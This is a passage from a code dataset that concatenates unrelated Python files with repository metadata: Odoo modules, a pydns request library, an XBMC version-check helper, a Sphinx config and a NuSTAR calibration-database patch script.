elif code_len > 3 and code_len <= 6:
code_form = code_str[17 - code_len:21]
elif code_len > 6 and code_len <= 9:
code_form = code_str[16 - code_len:21]
elif code_len > 9 and code_len <= 12:
code_form = code_str[15 - code_len:21]
elif code_len > 12 and code_len <= 14:
code_form = code_str[14 - code_len:21]
return code_form
class Document(models.Model):
_inherit = 'myo.document'
code = fields.Char(string='Code', required=False, default=False,
help='Use "/" to get an automatic new Document Code.')
@api.model
def create(self, values):
if 'code' not in values or ('code' in values and values['code'] == '/'):
code_seq = self.pool.get('ir.sequence').next_by_code(self._cr, self._uid, 'myo.document.code')
values['code'] = format_code(code_seq)
return super(Document, self).create(values)
@api.multi
def write(self, values):
if 'code' in values and values['code'] == '/':
code_seq = self.pool.get('ir.sequence').next_by_code(self._cr, self._uid, 'myo.document.code')
values['code'] = format_code(code_seq)
return super(Document, self).write(values)
@api.one
def copy(self, default=None):
default = dict(default or {})
default.update({'code': '/', })
return super(Document, self).copy(default)
| agpl-3.0 |
sanghinitin/golismero | tools/theHarvester/discovery/DNS/Base.py | 24 | 11574 | """
$Id: Base.py,v 1.12.2.4 2007/05/22 20:28:31 customdesigned Exp $
This file is part of the pydns project.
Homepage: http://pydns.sourceforge.net
This code is covered by the standard Python License.
Base functionality. Request and Response classes, that sort of thing.
"""
import socket, string, types, time
import Type, Class, Opcode
import asyncore
class DNSError(Exception): pass
defaults = { 'protocol':'udp', 'port':53, 'opcode':Opcode.QUERY,
'qtype':Type.A, 'rd':1, 'timing':1, 'timeout': 30 }
defaults['server'] = []
def ParseResolvConf(resolv_path):
global defaults
try:
lines = open(resolv_path).readlines()
except:
print "error in path" + resolv_path
for line in lines:
line = string.strip(line)
if not line or line[0] == ';' or line[0] == '#':
continue
fields = string.split(line)
if len(fields) < 2:
continue
if fields[0] == 'domain' and len(fields) > 1:
defaults['domain'] = fields[1]
if fields[0] == 'search':
pass
if fields[0] == 'options':
pass
if fields[0] == 'sortlist':
pass
if fields[0] == 'nameserver':
defaults['server'].append(fields[1])
def DiscoverNameServers():
import sys
if sys.platform in ('win32', 'nt'):
import win32dns
defaults['server'] = win32dns.RegistryResolve()
else:
return ParseResolvConf()
class DnsRequest:
""" high level Request object """
def __init__(self, *name, **args):
self.donefunc = None
self.async = None
self.defaults = {}
self.argparse(name, args)
self.defaults = self.args
def argparse(self, name, args):
if not name and self.defaults.has_key('name'):
args['name'] = self.defaults['name']
if type(name) is types.StringType:
args['name'] = name
else:
if len(name) == 1:
if name[0]:
args['name'] = name[0]
for i in defaults.keys():
if not args.has_key(i):
if self.defaults.has_key(i):
args[i] = self.defaults[i]
else:
args[i] = defaults[i]
if type(args['server']) == types.StringType:
args['server'] = [args['server']]
self.args = args
def socketInit(self, a, b):
self.s = socket.socket(a, b)
def processUDPReply(self):
import time, select
if self.args['timeout'] > 0:
r, w, e = select.select([self.s], [], [], self.args['timeout'])
if not len(r):
raise DNSError, 'Timeout'
self.reply = self.s.recv(1024)
self.time_finish = time.time()
self.args['server'] = self.ns
return self.processReply()
def processTCPReply(self):
import time, Lib
self.f = self.s.makefile('r')
header = self.f.read(2)
if len(header) < 2:
raise DNSError, 'EOF'
count = Lib.unpack16bit(header)
self.reply = self.f.read(count)
if len(self.reply) != count:
raise DNSError, 'incomplete reply'
self.time_finish = time.time()
self.args['server'] = self.ns
return self.processReply()
def processReply(self):
import Lib
self.args['elapsed'] = (self.time_finish - self.time_start) * 1000
u = Lib.Munpacker(self.reply)
r = Lib.DnsResult(u, self.args)
r.args = self.args
#self.args=None # mark this DnsRequest object as used.
return r
#### TODO TODO TODO ####
# if protocol == 'tcp' and qtype == Type.AXFR:
# while 1:
# header = f.read(2)
# if len(header) < 2:
# print '========== EOF =========='
# break
# count = Lib.unpack16bit(header)
# if not count:
# print '========== ZERO COUNT =========='
# break
# print '========== NEXT =========='
# reply = f.read(count)
# if len(reply) != count:
# print '*** Incomplete reply ***'
# break
# u = Lib.Munpacker(reply)
# Lib.dumpM(u)
def conn(self):
self.s.connect((self.ns, self.port))
def req(self, *name, **args):
" needs a refactoring "
import time, Lib
self.argparse(name, args)
#if not self.args:
# raise DNSError,'reinitialize request before reuse'
protocol = self.args['protocol']
self.port = self.args['port']
opcode = self.args['opcode']
rd = self.args['rd']
server = self.args['server']
if type(self.args['qtype']) == types.StringType:
try:
qtype = getattr(Type, string.upper(self.args['qtype']))
except AttributeError:
raise DNSError, 'unknown query type'
else:
qtype = self.args['qtype']
if not self.args.has_key('name'):
print self.args
raise DNSError, 'nothing to lookup'
qname = self.args['name']
if qtype == Type.AXFR:
print 'Query type AXFR, protocol forced to TCP'
protocol = 'tcp'
#print 'QTYPE %d(%s)' % (qtype, Type.typestr(qtype))
m = Lib.Mpacker()
# jesus. keywords and default args would be good. TODO.
m.addHeader(0,
0, opcode, 0, 0, rd, 0, 0, 0,
1, 0, 0, 0)
m.addQuestion(qname, qtype, Class.IN)
self.request = m.getbuf()
try:
if protocol == 'udp':
self.sendUDPRequest(server)
else:
self.sendTCPRequest(server)
except socket.error, reason:
raise DNSError, reason
if self.async:
return None
else:
return self.response
def sendUDPRequest(self, server):
"refactor me"
self.response = None
self.socketInit(socket.AF_INET, socket.SOCK_DGRAM)
for self.ns in server:
try:
# TODO. Handle timeouts &c correctly (RFC)
#self.s.connect((self.ns, self.port))
self.conn()
self.time_start = time.time()
if not self.async:
self.s.send(self.request)
self.response = self.processUDPReply()
#except socket.error:
except None:
continue
break
if not self.response:
if not self.async:
raise DNSError, 'no working nameservers found'
def sendTCPRequest(self, server):
" do the work of sending a TCP request "
import time, Lib
self.response = None
for self.ns in server:
try:
self.socketInit(socket.AF_INET, socket.SOCK_STREAM)
self.time_start = time.time()
self.conn()
self.s.send(Lib.pack16bit(len(self.request)) + self.request)
self.s.shutdown(1)
self.response = self.processTCPReply()
except socket.error:
continue
break
if not self.response:
raise DNSError, 'no working nameservers found'
#class DnsAsyncRequest(DnsRequest):
class DnsAsyncRequest(DnsRequest, asyncore.dispatcher_with_send):
" an asynchronous request object. out of date, probably broken "
def __init__(self, *name, **args):
DnsRequest.__init__(self, *name, **args)
# XXX todo
if args.has_key('done') and args['done']:
self.donefunc = args['done']
else:
self.donefunc = self.showResult
#self.realinit(name,args) # XXX todo
self.async = 1
def conn(self):
import time
self.connect((self.ns, self.port))
self.time_start = time.time()
if self.args.has_key('start') and self.args['start']:
asyncore.dispatcher.go(self)
def socketInit(self, a, b):
self.create_socket(a, b)
asyncore.dispatcher.__init__(self)
self.s = self
def handle_read(self):
if self.args['protocol'] == 'udp':
self.response = self.processUDPReply()
if self.donefunc:
apply(self.donefunc, (self,))
def handle_connect(self):
self.send(self.request)
def handle_write(self):
pass
def showResult(self, *s):
self.response.show()
#
# $Log: Base.py,v $
# Revision 1.12.2.4 2007/05/22 20:28:31 customdesigned
# Missing import Lib
#
# Revision 1.12.2.3 2007/05/22 20:25:52 customdesigned
# Use socket.inetntoa,inetaton.
#
# Revision 1.12.2.2 2007/05/22 20:21:46 customdesigned
# Trap socket error
#
# Revision 1.12.2.1 2007/05/22 20:19:35 customdesigned
# Skip bogus but non-empty lines in resolv.conf
#
# Revision 1.12 2002/04/23 06:04:27 anthonybaxter
# attempt to refactor the DNSRequest.req method a little. after doing a bit
# of this, I've decided to bite the bullet and just rewrite the puppy. will
# be checkin in some design notes, then unit tests and then writing the sod.
#
# Revision 1.11 2002/03/19 13:05:02 anthonybaxter
# converted to class based exceptions (there goes the python1.4 compatibility :)
#
# removed a quite gross use of 'eval()'.
#
# Revision 1.10 2002/03/19 12:41:33 anthonybaxter
# tabnannied and reindented everything. 4 space indent, no tabs.
# yay.
#
# Revision 1.9 2002/03/19 12:26:13 anthonybaxter
# death to leading tabs.
#
# Revision 1.8 2002/03/19 10:30:33 anthonybaxter
# first round of major bits and pieces. The major stuff here (summarised
# from my local, off-net CVS server :/ this will cause some oddities with
# the
#
# tests/testPackers.py:
# a large slab of unit tests for the packer and unpacker code in DNS.Lib
#
# DNS/Lib.py:
# placeholder for addSRV.
# added 'klass' to addA, make it the same as the other A* records.
# made addTXT check for being passed a string, turn it into a length 1 list.
# explicitly check for adding a string of length > 255 (prohibited).
# a bunch of cleanups from a first pass with pychecker
# new code for pack/unpack. the bitwise stuff uses struct, for a smallish
# (disappointly small, actually) improvement, while addr2bin is much
# much faster now.
#
# DNS/Base.py:
# added DiscoverNameServers. This automatically does the right thing
# on unix/ win32. No idea how MacOS handles this. *sigh*
# Incompatible change: Don't use ParseResolvConf on non-unix, use this
# function, instead!
# a bunch of cleanups from a first pass with pychecker
#
# Revision 1.5 2001/08/09 09:22:28 anthonybaxter
# added what I hope is win32 resolver lookup support. I'll need to try
# and figure out how to get the CVS checkout onto my windows machine to
# make sure it works (wow, doing something other than games on the
# windows machine :)
#
# Code from [email protected]
# win32dns.py from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66260
#
# Really, ParseResolvConf() should be renamed "FindNameServers" or
# some such.
#
# Revision 1.4 2001/08/09 09:08:55 anthonybaxter
# added identifying header to top of each file
#
# Revision 1.3 2001/07/19 07:20:12 anthony
# Handle blank resolv.conf lines.
# Patch from Bastian Kleineidam
#
# Revision 1.2 2001/07/19 06:57:07 anthony
# cvs keywords added
#
#
| gpl-2.0 |
station7/xbmc | addons/service.xbmc.versioncheck/lib/common.py | 82 | 6948 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Team-XBMC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import os
import xbmc
import xbmcaddon
import xbmcgui
import xbmcvfs
ADDON = xbmcaddon.Addon()
ADDONVERSION = ADDON.getAddonInfo('version')
ADDONNAME = ADDON.getAddonInfo('name')
ADDONPATH = ADDON.getAddonInfo('path').decode('utf-8')
ADDONPROFILE = xbmc.translatePath( ADDON.getAddonInfo('profile') ).decode('utf-8')
ICON = ADDON.getAddonInfo('icon')
monitor = xbmc.Monitor()
# Fixes unicode problems
def string_unicode(text, encoding='utf-8'):
try:
text = unicode( text, encoding )
except:
pass
return text
def normalize_string(text):
try:
text = unicodedata.normalize('NFKD', string_unicode(text)).encode('ascii', 'ignore')
except:
pass
return text
def localise(id):
string = normalize_string(ADDON.getLocalizedString(id))
return string
def log(txt):
if isinstance (txt,str):
txt = txt.decode("utf-8")
message = u'%s: %s' % ("Version Check", txt)
xbmc.log(msg=message.encode("utf-8"), level=xbmc.LOGDEBUG)
def get_password_from_user():
keyboard = xbmc.Keyboard("", ADDONNAME + "," +localise(32022), True)
keyboard.doModal()
if (keyboard.isConfirmed()):
pwd = keyboard.getText()
return pwd
def message_upgrade_success():
xbmc.executebuiltin("XBMC.Notification(%s, %s, %d, %s)" %(ADDONNAME,
localise(32013),
15000,
ICON))
def message_restart():
if dialog_yesno(32014):
xbmc.executebuiltin("RestartApp")
def dialog_yesno(line1 = 0, line2 = 0):
return xbmcgui.Dialog().yesno(ADDONNAME,
localise(line1),
localise(line2))
def upgrade_message(msg, oldversion, upgrade, msg_current, msg_available):
wait_for_end_of_video()
if ADDON.getSetting("lastnotified_version") < ADDONVERSION:
xbmcgui.Dialog().ok(ADDONNAME,
localise(msg),
localise(32001),
localise(32002))
#ADDON.setSetting("lastnotified_version", ADDONVERSION)
else:
log("Already notified one time for upgrading.")
def upgrade_message2( version_installed, version_available, version_stable, oldversion, upgrade,):
# shorten releasecandidate to rc
if version_installed['tag'] == 'releasecandidate':
version_installed['tag'] = 'rc'
if version_available['tag'] == 'releasecandidate':
version_available['tag'] = 'rc'
# convert json-rpc result to strings for usage
msg_current = '%i.%i %s%s' %(version_installed['major'],
version_installed['minor'],
version_installed['tag'],
version_installed.get('tagversion',''))
msg_available = version_available['major'] + '.' + version_available['minor'] + ' ' + version_available['tag'] + version_available.get('tagversion','')
msg_stable = version_stable['major'] + '.' + version_stable['minor'] + ' ' + version_stable['tag'] + version_stable.get('tagversion','')
msg = localise(32034) %(msg_current, msg_available)
wait_for_end_of_video()
# hack: convert current version number to stable string
# so users don't get notified again. remove in future
if ADDON.getSetting("lastnotified_version") == '0.1.24':
ADDON.setSetting("lastnotified_stable", msg_stable)
# Show different dialogs depending if there's a newer stable available.
# Also split them between xbmc and kodi notifications to reduce possible confusion.
# People will find out once they visit the website.
# For stable only notify once and when there's a newer stable available.
# Ignore any add-on updates as those only count for != stable
if oldversion == 'stable' and ADDON.getSetting("lastnotified_stable") != msg_stable:
if xbmcaddon.Addon('xbmc.addon').getAddonInfo('version') < "13.9.0":
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32030),
localise(32031))
else:
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32032),
localise(32033))
ADDON.setSetting("lastnotified_stable", msg_stable)
elif oldversion != 'stable' and ADDON.getSetting("lastnotified_version") != msg_available:
if xbmcaddon.Addon('xbmc.addon').getAddonInfo('version') < "13.9.0":
# point them to xbmc.org
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32035),
localise(32031))
else:
#use kodi.tv
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32035),
localise(32033))
# older skins don't support a text field in the OK dialog.
# let's use split lines for now. see code above.
'''
msg = localise(32034) %(msg_current, msg_available)
if oldversion == 'stable':
msg = msg + ' ' + localise(32030)
else:
msg = msg + ' ' + localise(32035)
msg = msg + ' ' + localise(32031)
xbmcgui.Dialog().ok(ADDONNAME, msg)
#ADDON.setSetting("lastnotified_version", ADDONVERSION)
'''
ADDON.setSetting("lastnotified_version", msg_available)
else:
log("Already notified one time for upgrading.")
def wait_for_end_of_video():
# Don't show notify while watching a video
while xbmc.Player().isPlayingVideo() and not monitor.abortRequested():
if monitor.waitForAbort(1):
# Abort was requested while waiting. We should exit
break
i = 0
while i < 10 and not monitor.abortRequested():
if monitor.waitForAbort(1):
# Abort was requested while waiting. We should exit
break
i += 1 | gpl-2.0 |
sbesson/openmicroscopy | docs/sphinx-api/conf.py | 6 | 4384 | # -*- coding: utf-8 -*-
#
# OMERO.py API documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 23 12:22:32 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import datetime
import sys, os
import os.path
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(os.path.join('..','..','dist','lib','python')))
sys.path.insert(0, os.path.abspath(os.path.join('..','..','dist','lib','python','omeroweb')))
os.environ['DJANGO_SETTINGS_MODULE'] = 'omeroweb.settings'
author = u'The Open Microscopy Environment'
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.todo', 'sphinx.ext.coverage']
autodoc_default_flags = ['members', 'undoc-members', 'private-members']
# General information about the project.
project = u'OMERO.py API'
targetname = 'OmeroPyAPI'
title = project + u' Documentation'
master_doc = 'index'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
version = os.environ.get('OMERO_RELEASE', 'UNKNOWN')
release = os.environ.get('OMERO_RELEASE', 'UNKNOWN')
# -- Options for HTML output ---------------------------------------------------
html_theme = 'api_theme'
# The suffix of source filenames.
source_suffix = '.rst'
# Output file base name for HTML help builder.
htmlhelp_basename = project+ ' doc'
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['../sphinx/common/themes', 'themes']
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', targetname + '.tex', title, author, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'omeropyapi', title, author, 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', targetname, title, author, targetname,
'One line description of project.', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
| gpl-2.0 |
mfacorcoran/pycaldb | nustar_caldb/nustar_caldb_patch.py | 1 | 9035 | def patch_nustar_caldb(version,
nupatchserver = "hassif.caltech.edu",
nupatchworkdir = "/pub/nustar/pipeline",
caldb = "/FTP/caldb",
caldbstage = "/FTP/caldb/staging",
ck_file_exists='True'):
"""
CALLING SEQUENCE:
patch_nustar_caldb(version,
nupatchserver = "hassif.caltech.edu",
nupatchworkdir = "/pub/nustar/pipeline",
caldb = "/FTP/caldb",
caldbstage = "/FTP/caldb/staging")
The following is from /web_chroot/FTP/.caldb_staging/data/nustar/README_rev1.txt
20131028
========
installing patch version 20131007 - STEPS:
a) first created a full version of the existing nustar caldb in the
/FTP/caldb/data/nustar in the nustar/versions are via rsync:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/versions
[caldbmgr]: mkdir 20131007
[caldbmgr]: cd 20131007
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/bcf .
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/cpf .
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/index .
b) wget the patch (using the location given in Brian Grefenstette's e-mail):
[caldbmgr]: cd /FTP/caldb/staging/data/nustar/versions/20131007/
[caldbmgr]: wget ftp://hassif.srl.caltech.edu/pub/nustar/pipeline/20131007/NUSTARCALDB_patch20131007.tgz
c) Untar the patch:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/versions/20131007
[caldbmgr]: ls
fpm NUSTARCALDB_patch20131007.tgz
[caldbmgr]: tar -zxvf NUSTARCALDB_patch20131007.tgz
fpm/caldb.indx
fpm/index/caldb.indx20131007
fpm/bcf/arf/nuA20100101v006.arf
fpm/bcf/arf/nuB20100101v006.arf
... stuff deleted ...
fpm/bcf/instrument/nuAhkrange05_20100101v005.fits
fpm/bcf/instrument/nuAhkrange04_20100101v005.fits
fpm/bcf/instrument/nuAhkrange03_20100101v005.fits
fpm/bcf/instrument/nuAhkrange02_20100101v005.fits
c) then link the (now full) 20131007 version to staging/data/nustar/fpm:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar
[caldbmgr]: ln -nfs versions/20131007/fpm .
[caldbmgr]: ls -l
total 12
lrwxrwxrwx 1 caldbmgr caldb 21 Oct 28 15:31 fpm -> versions/20131007/fpm
-rw-r--r-- 1 caldbmgr caldb 1909 Oct 28 15:27 README.txt
drwxr-xr-x 2 caldbmgr caldb 4096 Oct 28 15:09 to_ingest
drwxr-xr-x 7 caldbmgr caldb_stage 4096 Oct 28 15:14 versions
d) from Brian's e-mail list of new files in the patch, created caldb_update_nustar_20131007.txt in the "to_ingest" subdirectory:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/to_ingest
[caldbmgr]: ls -l
total 16
-rw-r--r-- 1 caldbmgr caldb 8839 Aug 14 11:27 caldb_update_nustar_20130509.txt
-rw-r--r-- 1 caldbmgr caldb 1636 Oct 28 15:09 caldb_update_nustar_20131007.txt
lrwxrwxrwx 1 caldbmgr caldb 32 Aug 14 11:02 caldb_update.txt -> caldb_update_nustar_20130509.txt
e) to ingest the data (as in other missions) run /web_chroot/FTP/caldb/local/scripts/DATA_DELIVERIES/nustar_caldbupdate.csh
:param version: string in 'YYYYMMDD' format, from nustar patch notification (from BG)
:param nupatchworkdir: URL of directory where patch tar file is located, from BG
:param caldb: location where the full NuSTAR caldb is stored
:param caldbstage: location of caldb staging area
:return:
"""
import os
import ftputil
import tarfile
import datetime
import shutil
from pycaldb import ck_file_existence
from astropy.io import fits as pyfits
#
# create patch install directory
#
versiondir=caldbstage+"/data/nustar/versions/"+version.strip().lower()
patchinstalldir = versiondir
if os.path.isdir(versiondir):
ans = raw_input("{0} exists; Do you want to remove it (Y/n)? ".format(versiondir))
try:
if ans.upper().strip()[0] <> "N":
shutil.rmtree(versiondir)
print("Creating clean {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
except IndexError: # user hit <CR> generating an empty string
shutil.rmtree(versiondir)
print("Creating clean {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
else:
print("Creating {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
#
#create a full version of the existing nustar caldb in the
# $CALDB/data/nustar in the nustar/versions are via rsync:
# cdirs=['bcf','cpf','index', 'caldb.indx']
# for c in cdirs:
# cmd = "rsync -avz " + caldb + "/data/nustar/fpm/" + c + " " + patchinstalldir + "/fpm"
# if os.path.isdir(patchinstalldir+'/fpm/'+c):
# ans = raw_input('\nDirectory '+patchinstalldir+'/fpm/'+c+' Exists. Remove it and re-download (Y/n)? ')
# if ans.lower().strip()[0] == 'y':
# shutil.rmtree(patchinstalldir+'/'+c)
# else:
# cmd = "echo keeping pre-existing directory "+patchinstalldir+'/fpm/'+c
# print (cmd)
# os.system(cmd)
#
# get the patch file
#
host = ftputil.FTPHost(nupatchserver,'anonymous','[email protected]')
patchfiledir = nupatchworkdir+'/'+version.strip()
patchfile = 'NUSTARCALDB_patch'+version.strip()+'.tgz'
print('\nDownloading {0}...'.format(patchfile))
try:
host.download(patchfiledir+'/'+patchfile,patchinstalldir+'/'+patchfile,mode='b') # need mode flag for ftputil<3.0
except TypeError:
host.download(patchfiledir + '/' + patchfile, patchinstalldir + '/' + patchfile) # if mode flag not present (ftputil>=3.0)
#
# untar the file
#
print('\nExtracting {0} to {1}'.format(patchfile, patchinstalldir))
ptf = tarfile.open(patchinstalldir+'/'+patchfile)
ptf.extractall(patchinstalldir)
newfiles = ptf.getnames()
#
# Link the updated version to staging/data/nustar/fpm:
#
#
dst = caldbstage+'/data/nustar/fpm'
if os.path.islink(dst):
os.remove(dst)
print "Creating symbolic link from {0} to {1}".format(patchinstalldir+"/fpm", dst)
try:
os.symlink(patchinstalldir+'/fpm', dst)
except:
print "Problem creating symbolic link to "+dst+"; Returning"
return
#
# check that all files in the cif exist in the new caldb
#
if ck_file_exists:
print ("\nChecking existence of files in the caldb.indx file...")
cif = pyfits.open(caldbstage+'/data/nustar/fpm/caldb.indx')
missing = ck_file_existence(cif, caldb=caldbstage, quiet=True)
if len(missing) > 0:
print "\nThese files are missing from the caldb:"
for f in missing:
print f
#
# create update file in staging/nustar/to_ingest directory
#
update_txt='from: [email protected]\n' \
'Subject: caldb update nustar '+version.strip()+'\n' \
'Date: '+datetime.datetime.now().strftime("%Y-%m-%d %H:%M")+'\n' \
'To: [email protected]\n\n' \
'instrument=fpm\n' \
'caldbindexfile=caldb.indx'+version.strip()+'\n\n' \
'newfile\n'
for f in newfiles: # get file list from patch tarfile
name=f.split('fpm/')[1]
if not 'caldb.indx' in name.strip().lower(): # don't include caldb.indx files in ingest note
update_txt=update_txt+name+"\n"
update_txt=update_txt+'endnewfile\n'
ingestfilename = 'caldb_update_nustar_'+version.strip()+'.txt'
ingestfile = caldbstage+'/data/nustar/to_ingest/'+ingestfilename
print('Creating {0}'.format(ingestfile))
fingest = open(ingestfile,'w')
fingest.write(update_txt)
fingest.close()
#print('\nEdit {0} and enter list of new files from the update e-mail from BG'.format(ingestfile))
#
# make symlink to caldb_update.txt file
#
curdir=os.getcwd()
to_ingestdir = caldbstage+"/data/nustar/to_ingest"
updatefile='caldb_update.txt'
os.chdir(to_ingestdir)
print "Creating symbolic link from {0} to {1} in {2}".format(ingestfilename, updatefile,to_ingestdir)
if os.path.islink(updatefile):
os.remove(updatefile)
try:
os.symlink(ingestfile, updatefile)
except:
print "Problem creating symbolic link to "+updatefile+"; Returning"
return
os.chdir(curdir)
return
if __name__ == "__main__":
#
# for sshfs mounted directories
#
caldb="/fuse/caldb"
stage = '/fuse/caldb_stage'
patch_nustar_caldb('20160606', caldb=caldb, caldbstage=stage, ck_file_exists=False)
| gpl-2.0 |
chand3040/sree_odoo | openerp/addons/l10n_ar/__init__.py | 2120 | 1456 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 2011 Cubic ERP - Teradata SAC. (http://cubicerp.com).
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
camptocamp/ngo-addons-backport | addons/resource/resource.py | 35 | 25745 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import pytz
from datetime import datetime, timedelta
from dateutil import rrule
import math
from faces import *
from openerp.osv import fields, osv
from openerp.tools.float_utils import float_compare
from openerp.tools.translate import _
from itertools import groupby
from operator import itemgetter
class resource_calendar(osv.osv):
_name = "resource.calendar"
_description = "Resource Calendar"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'company_id' : fields.many2one('res.company', 'Company', required=False),
'attendance_ids' : fields.one2many('resource.calendar.attendance', 'calendar_id', 'Working Time'),
'manager' : fields.many2one('res.users', 'Workgroup Manager'),
}
_defaults = {
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.calendar', context=context)
}
def working_hours_on_day(self, cr, uid, resource_calendar_id, day, context=None):
"""Calculates the Working Total Hours based on Resource Calendar and
given working day (datetime object).
@param resource_calendar_id: resource.calendar browse record
@param day: datetime object
@return: returns the working hours (as float) men should work on the given day if is in the attendance_ids of the resource_calendar_id (i.e if that day is a working day), returns 0.0 otherwise
"""
res = 0.0
for working_day in resource_calendar_id.attendance_ids:
if (int(working_day.dayofweek) + 1) == day.isoweekday():
res += working_day.hour_to - working_day.hour_from
return res
def _get_leaves(self, cr, uid, id, resource):
"""Private Method to Calculate resource Leaves days
@param id: resource calendar id
@param resource: resource id for which leaves will ew calculated
@return : returns the list of dates, where resource on leave in
resource.calendar.leaves object (e.g.['%Y-%m-%d', '%Y-%m-%d'])
"""
resource_cal_leaves = self.pool.get('resource.calendar.leaves')
dt_leave = []
resource_leave_ids = resource_cal_leaves.search(cr, uid, [('calendar_id','=',id), '|', ('resource_id','=',False), ('resource_id','=',resource)])
#res_leaves = resource_cal_leaves.read(cr, uid, resource_leave_ids, ['date_from', 'date_to'])
res_leaves = resource_cal_leaves.browse(cr, uid, resource_leave_ids)
for leave in res_leaves:
dtf = datetime.strptime(leave.date_from, '%Y-%m-%d %H:%M:%S')
dtt = datetime.strptime(leave.date_to, '%Y-%m-%d %H:%M:%S')
no = dtt - dtf
[dt_leave.append((dtf + timedelta(days=x)).strftime('%Y-%m-%d')) for x in range(int(no.days + 1))]
dt_leave.sort()
return dt_leave
def interval_min_get(self, cr, uid, id, dt_from, hours, resource=False):
"""
Calculates the working Schedule from supplied from date to till hours
will be satisfied based or resource calendar id. If resource is also
given then it will consider the resource leave also and than will
calculates resource working schedule
@param dt_from: datetime object, start of working scheduled
@param hours: float, total number working hours needed scheduled from
start date
@param resource : Optional Resource id, if supplied than resource leaves
will also taken into consideration for calculating working
schedule.
@return : List datetime object of working schedule based on supplies
params
"""
if not id:
td = int(hours)*3
